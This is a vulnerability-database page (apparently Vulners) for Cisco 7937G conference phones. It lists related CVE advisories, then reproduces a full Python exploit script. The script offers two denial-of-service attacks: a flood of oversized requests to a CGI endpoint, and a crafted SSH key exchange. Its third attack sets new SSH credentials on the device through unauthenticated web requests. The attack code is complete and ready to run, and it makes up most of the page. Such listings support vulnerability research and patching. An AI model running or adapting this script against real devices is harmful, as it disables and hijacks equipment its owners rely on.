Vulners
Lucene search
Cisco 7937G All-In-One Exploiter Exploit
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Cisco 7937G Denial Of Service Exploit | 11 Aug 202000:00 | – | zdt |
 | CVE-2020-16137 | 11 Aug 202011:07 | – | circl |
| CVE-2020-16138 | 11 Aug 202011:07 | – | circl |
| CVE-2020-16139 | 21 Aug 202014:32 | – | circl |
 | Cisco 7947G Elevation of Privilege Vulnerability | 14 Aug 202000:00 | – | cnvd |
| Cisco 7937G Denial of Service Vulnerability | 13 Aug 202000:00 | – | cnvd |
| Cisco 7937G Input Validation Error Vulnerability | 12 Aug 202000:00 | – | cnvd |
 | Cisco Unified IP Conference Station 7937G Denial of Service (CVE-2020-16139) | 5 Nov 202000:00 | – | checkpoint_advisories |
| Cisco Unified IP Conference Station Privilege Escalation (CVE-2020-16137) | 5 Nov 202000:00 | – | checkpoint_advisories |
 | CVE-2020-16137 | 12 Aug 202020:07 | – | cve |
10
# Exploit Title: Cisco 7937G All-In-One Exploiter
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
# CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137
#!/usr/bin/python
import sys
import getopt
import requests
import paramiko
import socket
import os
def main(argv):
target = ""
attack = ""
username = ""
password = ""
divider = "============================================="
help_text = '''
exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password]
%s
Example: exploit.py -t 192.168.1.200 -a 1
Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa
%s
Attack types:
1: DoS with automatic device reset
2: DoS without automatic device reset
3: Change SSH credentials of target device
''' % (divider, divider)
if len(sys.argv) == 1:
print(help_text)
sys.exit(2)
try:
opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="])
except getopt.GetoptError:
print(help_text)
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print(help_text)
sys.exit()
elif opt in ("-t", "--target"):
target = arg
elif opt in ("-a", "--attack"):
attack = arg
elif opt in ("-u", "--user"):
username = arg
elif opt in ("-p", "--password"):
password = arg
if username != "" and password != "" and attack == "3":
print("Starting SSH attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password)
finished = attack_ssh(target, username, password)
elif attack == "1":
print("Starting DoS reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_one(target)
elif attack == "2":
print("Starting DoS non-reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_two(target)
print(divider)
if finished == 1:
print("DoS reset attack completed!")
elif finished == 2:
print("DoS non-reset attack completed!")
print("Device must be power cycled to restore functionality.")
elif finished == 3:
tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password)
connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target)
print(tell)
print("You must specify the key exchange when connecting or the device will be DoS'd!")
print(connection_example)
elif finished == 0:
print("Something strange happened. Attack likely unsuccessful.")
sys.exit()
def dos_one(target):
url = "http://%s/localmenus.cgi" % target
data = "A"*46
payload = {"func": "609", "data": data, "rphl": "1"}
print("FIRING ZE MIZZLES!")
for i in range(1000):
try:
r = requests.post(url=url, params=payload, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
except requests.exceptions.RequestException:
return 1
return 0
def dos_two(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
try:
sock.connect((target, 22))
except OSError:
print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.")
sys.exit()
transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1"]})
fd = os.open("/dev/null", os.O_WRONLY)
savefd = os.dup(2)
os.dup2(fd, 2)
try:
transport.connect(username="notreal", password="notreal")
except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
os.dup2(savefd, 2)
return 2
return 0
def attack_ssh(target, username, password):
url = "http://%s/localmenus.cgi" % target
payload_user = {"func": "403", "set": "401", "name1": username, "name2": username}
payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password}
print("FIRING ZE MIZZLES!")
try:
r = requests.post(url=url, params=payload_user, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
r = requests.post(url=url, params=payload_pass, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
except requests.exceptions.RequestException:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
return 3
if __name__ == "__main__":
main(sys.argv[1:])
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2020 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 27.8
CVSS 3.19.8
EPSS0.7945
SSVC